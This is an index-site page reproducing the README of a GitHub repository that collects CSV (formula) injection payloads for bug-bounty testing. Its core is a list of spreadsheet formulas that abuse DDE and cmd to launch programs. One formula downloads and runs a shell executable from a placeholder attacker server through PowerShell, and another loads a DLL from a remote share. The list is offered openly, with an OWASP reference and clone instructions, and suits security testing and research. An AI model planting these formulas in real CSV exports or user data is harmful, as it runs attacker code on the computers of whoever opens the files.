Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/payloadbox/csv-injection-payloads
🎯 CSV Injection Payloads
https://github.com/payloadbox/csv-injection-payloads
bug-bounty bugbounty bugbountytips code-security csv csv-exploit csv-injection csv-payload csv-payloads payload payloadbox payloads security websec websecurity
Last synced: about 4 hours ago
JSON representation
🎯 CSV Injection Payloads
- Host: GitHub
- URL: https://github.com/payloadbox/csv-injection-payloads
- Owner: payloadbox
- License: mit
- Created: 2020-06-27T08:51:26.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2023-06-16T01:39:28.000Z (over 1 year ago)
- Last Synced: 2023-11-07T17:10:05.617Z (about 1 year ago)
- Topics: bug-bounty, bugbounty, bugbountytips, code-security, csv, csv-exploit, csv-injection, csv-payload, csv-payloads, payload, payloadbox, payloads, security, websec, websecurity
- Homepage: https://ismailtasdelen.medium.com
- Size: 7.81 KB
- Stars: 159
- Watchers: 6
- Forks: 68
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
## CSV Injection Payloads
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.
#### Payloads :
```
=DDE("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
#### References :
###### CSV Injection :
* 👉 https://owasp.org/www-community/attacks/CSV_Injection
##### Cloning an Existing Repository ( Clone with HTTPS )
```
root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git
```
##### Cloning an Existing Repository ( Clone with SSH )
```
root@ismailtasdelen:~# git clone [email protected]:payloadbox/csv-injection-payloads.git
```
#### Donate!
Support the authors:
#### LiberaPay:
